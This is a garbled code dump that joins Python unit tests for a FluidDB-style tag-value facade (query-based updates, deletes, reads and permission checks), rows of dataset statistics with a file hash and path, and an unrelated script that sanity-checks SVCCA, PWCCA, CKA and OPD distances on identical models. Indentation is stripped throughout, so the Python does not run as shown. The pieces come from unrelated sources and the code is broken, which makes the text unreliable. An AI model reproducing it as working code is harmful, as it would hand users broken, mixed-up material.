# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithMultipleQueries(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can resolve multiple
L{Query}s and store the appropriate L{TagValue}s.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/bar': 42},
objectID2: {u'username/bar': 1234}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', 2600)]),
(u'username/bar = 1234',
[TagPathAndValue(u'username/bar', 4321)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID1, objectID2], [u'username/bar'])
tagValue1 = result[objectID1][u'username/bar'].value
tagValue2 = result[objectID2][u'username/bar'].value
self.assertEqual(2600, tagValue1)
self.assertEqual(4321, tagValue2)
@inlineCallbacks
def testUpdateValuesForQueriesWithFloatValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{float}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', 12.34)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(12.34, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithSetValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{set} of
C{unicode} strings.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar',
[u'foo', u'bar'])])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
self.assertEqual([u'foo', u'bar'],
result[objectID][u'username/bar'].value)
@inlineCallbacks
def testUpdateValuesForQueriesWithNoneValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{None}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', None)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
self.assertEqual(None,
result[objectID][u'username/bar'].value)
@inlineCallbacks
def testUpdateValuesForQueriesWithBoolValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{bool}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', True)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
self.assertTrue(result[objectID][u'username/bar'].value)
@inlineCallbacks
def testUpdateValuesForQueriesWithMixedValues(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store L{TagValue}s
of different types: C{bool}, C{None}, C{int}, C{float}, C{unicode} and
C{set} of C{unicode}.
"""
SecureTagAPI(self.user).create([(u'username/test1', u'description'),
(u'username/test2', u'description'),
(u'username/test3', u'description'),
(u'username/test4', u'description'),
(u'username/test5', u'description'),
(u'username/test6', u'description')])
paths = [u'username/test1', u'username/test2', u'username/test3',
u'username/test4', u'username/test5', u'username/test6']
tags = list(getTags(paths=paths))
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/test1': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryValues = {u'username/test1': True,
u'username/test2': None,
u'username/test3': 123,
u'username/test4': 12.34,
u'username/test5': u'test',
u'username/test6': [u'a', u'b']}
valuesQuerySchema = ValuesQuerySchema(
[(u'username/test1 = 42',
[TagPathAndValue(path, value) for path, value
in queryValues.iteritems()])])
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
expected = {objectID: queryValues}
result = dict()
tagPairs = [(objectID, tag.id) for tag in tags]
values = getTagValues(values=tagPairs)
for value in values:
result.setdefault(value.objectID, {})[value.tag.path] = value.value
self.assertEqual(expected, result)
@inlineCallbacks
def testDeleteValuesForQueryWithInvalidQuery(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a L{TParseError}
exception if the incoming L{Query} can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'username/unknown 42', [u'username/unknown'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testDeleteValuesForQueryWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a L{TBadRequest}
exception if the incoming L{Query} contains an illegal expression.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'has fluiddb/about', [u'username/unknown'])
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testDeleteValuesForQueryWithSearch(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a L{TParseError}
exception if the incoming L{Query} contains a C{has fluiddb/id}
expression, which can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'has fluiddb/id', [u'username/unknown'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testDeleteValuesForQueryWithUnknownTag(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a
L{TNonexistentTag} exception if any of the requested L{Tag.path}s don't
exist.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description'),
(u'username/foo', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/foo': 12,
u'username/bar': u'test1'},
objectID2: {u'username/foo': 42,
u'username/bar': u'test2'}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'username/unknown = 42 or username/foo = 12',
[u'username/bar'])
yield self.assertFailure(deferred, TNonexistentTag)
@inlineCallbacks
def testDeleteValuesForQueryWithMissingTag(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} does not raise an exception
if any of the requested L{Tag.path}s are not present on any matching
objects.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description'),
(u'username/foo', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/foo': 12},
objectID2: {u'username/foo': 42,
u'username/bar': u'test2'}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'username/foo = 12',
[u'username/bar'])
@inlineCallbacks
def testDeleteValuesForQueryWithReadPermissionDenied(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the L{Tag}s in the
L{Query}.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
values = [(u'fred/bar', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'fred/bar = 42', [u'fred/bar'])
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testDeleteValuesForQueryWithDeletePermissionDenied(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.DELETE_TAG_VALUE} permission on any of the outgoing
L{Tag}s.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'fred')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/foo', u'description')])
SecureTagValueAPI(user).set({uuid4(): {u'fred/foo': 42}})
runDataImportHandler(self.client.url)
permissions.set([(u'fred/foo', Operation.DELETE_TAG_VALUE,
Policy.CLOSED, [u'fred'])])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'fred/foo = 42', [u'fred/foo'])
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('delete', error.action)
self.assertEqual(u'fred/foo', error.path)
@inlineCallbacks
def testDeleteValuesForQuery(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} deletes the L{TagValue}
of an object if the L{Query} matches and the L{User} has permissions.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/bar': 42},
objectID2: {u'username/bar': 123}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'username/bar = 42', [u'username/bar'])
result = valuesAPI.get([objectID1, objectID2],
[u'username/bar'])
tagValue = result[objectID2][u'username/bar'].value
self.assertEqual(123, tagValue)
@inlineCallbacks
def testDeleteValuesForQueryWithoutReturnTags(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} deletes all available
L{TagValue}s for the objects the L{Query} matches and that the L{User}
has L{Operation.DELETE_TAG_VALUE} permission for.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set({objectID1: {u'username/bar': 42},
objectID2: {u'username/bar': 123}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(session,
u'username/bar = 42')
result = valuesAPI.get([objectID1, objectID2], [u'username/bar'])
self.assertEqual(1, len(result))
self.assertEqual(1, len(result[objectID2]))
self.assertEqual(123, result[objectID2][u'username/bar'].value)
@inlineCallbacks
def testDeleteValuesForQueryOnlyConsidersSpecifiedTags(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} deletes L{TagValue}s for
the objects the L{Query} matches and that match the specified L{Tag}
paths.
"""
objectID = uuid4()
values = SecureTagValueAPI(self.user)
values.set({objectID: {u'username/bar': 42, u'username/foo': 123}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'has username/bar', [u'username/bar'])
result = values.get([objectID], [u'username/bar', u'username/foo'])
self.assertEqual(1, len(result))
self.assertEqual(1, len(result[objectID]))
self.assertEqual(123, result[objectID][u'username/foo'].value)
@inlineCallbacks
def testDeleteValuesForQueryWithEmptyQueryResults(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} does not fail if a
L{Query} results in an empty C{set}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'username/bar = 2600', [u'username/bar'])
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(42, tagValue)
def testGetValuesForQueryWithUnknownTagInQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a L{TNonexistentTag}
exception if any of the requested L{Tag.path}s in the L{Query} don't
exist.
"""
SecureTagValueAPI(self.user).set({uuid4(): {u'username/tag': 12}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'username/unknown = 42 or username/tag = 12',
[u'username/tag'])
return self.assertFailure(deferred, TNonexistentTag)
@inlineCallbacks
def testGetValuesForQueryWithUnknownTagInReturnTags(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} ignores requested
L{Tag.path}s that don't exist. If none of the requested
L{Tag.path}s exist, an empty result is returned.
"""
SecureTagValueAPI(self.user).set({uuid4(): {u'username/tag': 12}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
result = yield self.facade.getValuesForQuery(
session, u'username/tag = 12', [u'username/unknown'])
self.assertEqual({u'results': {u'id': {}}}, loads(result))
@inlineCallbacks
def testGetValuesForQueryWithPartialUnknownTagInReturnTags(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} ignores requested
L{Tag.path}s that don't exist. L{Tag.path}s that exist and have
values matched by the query are returned.
"""
objectID = uuid4()
SecureTagValueAPI(self.user).set({objectID: {u'username/tag': 12}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
result = yield self.facade.getValuesForQuery(
session, u'username/tag = 12',
[u'username/unknown', u'username/tag'])
result = loads(result)
updatedAt = (result[u'results'][u'id'][str(objectID)]
[u'username/tag']['updated-at'])
value = {str(objectID): {
u'username/tag': {'value': 12,
'updated-at': updatedAt,
'username': u'username'}}}
expected = {u'results': {u'id': value}}
self.assertEqual(expected, result)
@inlineCallbacks
def testGetValuesForQueryWithOnlyFluidDBIDTag(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns matching object IDs
when the C{fluiddb/id} tag is requested.
"""
SecureTagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/tag': 12}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'has username/tag', [u'fluiddb/id'])
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'fluiddb/id']['updated-at'])
value = {str(objectID): {u'fluiddb/id': {'value': str(objectID),
'updated-at': updatedAt,
'username': u'fluiddb'}}}
expected = {u'results': {u'id': value}}
self.assertEqual(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithFluidDBIDTag(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns matching object IDs
when the C{fluiddb/id} tag is requested, in addition to other
L{Tag.path}s.
"""
SecureTagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/tag': 12}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'has username/tag', [u'fluiddb/id', u'username/tag'])
results = loads(results)
updatedAt1 = (results[u'results'][u'id'][str(objectID)]
[u'fluiddb/id']['updated-at'])
updatedAt2 = (results[u'results'][u'id'][str(objectID)]
[u'username/tag']['updated-at'])
value = {str(objectID): {
u'fluiddb/id': {
'value': str(objectID),
'updated-at': updatedAt1,
'username': u'fluiddb'},
u'username/tag': {
'value': 12,
'updated-at': updatedAt2,
'username': u'username'}}}
expected = {u'results': {u'id': value}}
self.assertEqual(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithReadQueryPermissionDenied(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the L{Tag}s in the
L{Query}.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
values = [(u'fred/bar', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'fred/bar = 42', [u'fred/bar'])
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testGetValuesForQueryWithReadReturnPermissionDenied(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the outgoing
L{Tag}s.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'fred')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/foo', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {uuid4(): {u'fred/bar': 42}}
SecureTagValueAPI(user).set(values)
runDataImportHandler(self.client.url)
values = [(u'fred/foo', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'fred/bar = 42', [u'fred/foo'])
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/foo', error.path)
@inlineCallbacks
def testGetValuesForQueryWithInvalidQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a
L{TParseError} exception if the incoming L{Query} can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'username/bar 42', [u'username/bar'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testGetValuesForQueryWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a L{TBadRequest}
exception if the incoming L{Query} contains an illegal expression.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'has fluiddb/about', [u'username/bar'])
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testGetValuesForQueryWithSearchError(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a L{TParseError}
exception if the incoming L{Query} contains a C{has fluiddb/id}
expression, which can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(session, u'has fluiddb/id',
[u'username/bar'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testGetValuesForQueryWithEmptyQueryResults(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} does not fail if a
L{Query} results in an empty C{set}.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
createTagValue(self.user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'username/bar = 2600', [u'username/bar'])
expected = {u'results': {u'id': {}}}
self.assertEqual(expected, loads(results))
@inlineCallbacks
def testGetValuesForQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns the L{TagValue}
of an object if the L{Query} matches and the L{User} has permissions.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'username/bar = 42', [u'username/bar'])
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'username/bar']['updated-at'])
expected = {
u'results': {
u'id': {
str(objectID): {
u'username/bar': {
u'value': 42,
u'updated-at': updatedAt,
u'username': 'username'}}}}}
self.assertEqual(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithoutReturnTags(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns all available
L{TagValue}s for the objects the L{Query} matches and that the L{User}
has L{Operation.READ_TAG_VALUE} permission for.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(session,
u'username/bar = 42')
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'username/bar']['updated-at'])
expected = {
u'results': {
u'id': {
str(objectID): {
u'username/bar': {
u'value': 42,
u'updated-at': updatedAt,
u'username': 'username'}}}}}
self.assertEqual(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithBinaryValue(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns only the MIME type
and the size of binary L{TagValue}s, but not their contents.
"""
SecureTagAPI(self.user).create([(u'username/tag1', u'description'),
(u'username/tag2', u'description')])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
objectID = uuid4()
thriftValue = createBinaryThriftValue('Hello, world!',
'text/plain')
yield self.facade.setTagInstance(session, u'username/tag1',
str(objectID), thriftValue)
thriftValue = createThriftValue(42)
yield self.facade.setTagInstance(session, u'username/tag2',
str(objectID), thriftValue)
runDataImportHandler(self.client.url)
results = yield self.facade.getValuesForQuery(
session, u'username/tag2 = 42', [u'username/tag1'])
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'username/tag1']['updated-at'])
expected = {
u'results': {
u'id': {
str(objectID): {
u'username/tag1': {
u'value-type': u'text/plain',
u'size': 13,
u'updated-at': updatedAt,
u'username': u'username'}}}}}
self.assertEqual(expected, results)
| 46.03868
| 79
| 0.594976
| 7,743
| 80,936
| 6.213096
| 0.052305
| 0.070529
| 0.037665
| 0.031055
| 0.811695
| 0.786626
| 0.763865
| 0.726449
| 0.694729
| 0.685312
| 0
| 0.010556
| 0.290686
| 80,936
| 1,757
| 80
| 46.064883
| 0.827431
| 0.142854
| 0
| 0.728287
| 0
| 0
| 0.112357
| 0.000989
| 0
| 0
| 0
| 0.01366
| 0.102789
| 1
| 0.066932
| false
| 0.008765
| 0.046215
| 0
| 0.117131
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2963e605f7456bc485b2ec8970c708bb5511e7bc
| 14,588
|
py
|
Python
|
sanity_checks/sanity_check_inspired_for_div.py
|
brando90/ultimate-anatome
|
9240d0530ad6d0533f9695d4e3cfab3991715c4e
|
[
"MIT"
] | 3
|
2022-01-04T15:53:23.000Z
|
2022-02-01T18:51:43.000Z
|
sanity_checks/sanity_check_inspired_for_div.py
|
brando90/ultimate-anatome
|
9240d0530ad6d0533f9695d4e3cfab3991715c4e
|
[
"MIT"
] | 3
|
2021-11-03T15:59:28.000Z
|
2021-12-01T04:29:59.000Z
|
sanity_checks/sanity_check_inspired_for_div.py
|
brando90/ultimate-anatome
|
9240d0530ad6d0533f9695d4e3cfab3991715c4e
|
[
"MIT"
] | 1
|
2022-03-11T15:43:36.000Z
|
2022-03-11T15:43:36.000Z
|
# import torch
# import numpy as np
# import random
#
# np.random.seed(0)
# torch.manual_seed(0)
# random.seed(0)
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print('--- Sanity check: dCCA == 0.0 when using same reference to the same net with the same input. --')
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = mdl1
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
metric_comparison_type = 'svcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'pwcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'lincka'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'opd'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0, tolerance=1e-2)}')
assert(approx_equal(dist, 0.0, tolerance=1e-2)), f'dist should be close to 0.0 but got {dist=}'
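# Editor's consolidation sketch (hedged): the four blocks above differ only in
# metric_comparison_type, so the same checks can be expressed as a loop; this
# assumes the uutils get_metric/approx_equal signatures used above, with the
# loosest tolerance in this cell (1e-2) applied uniformly.
for metric in ['svcca', 'pwcca', 'lincka', 'opd']:
X = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
d = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric, metric_as_sim_or_dist=metric_as_sim_or_dist)
assert approx_equal(d, 0.0, tolerance=1e-2), f'{metric=} gave {d=}'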
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print('--- Sanity check: dCCA == 0.0 when using the same net twice via different references with the same input (deepcopy). --')
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = deepcopy(mdl1)
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
metric_comparison_type = 'svcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
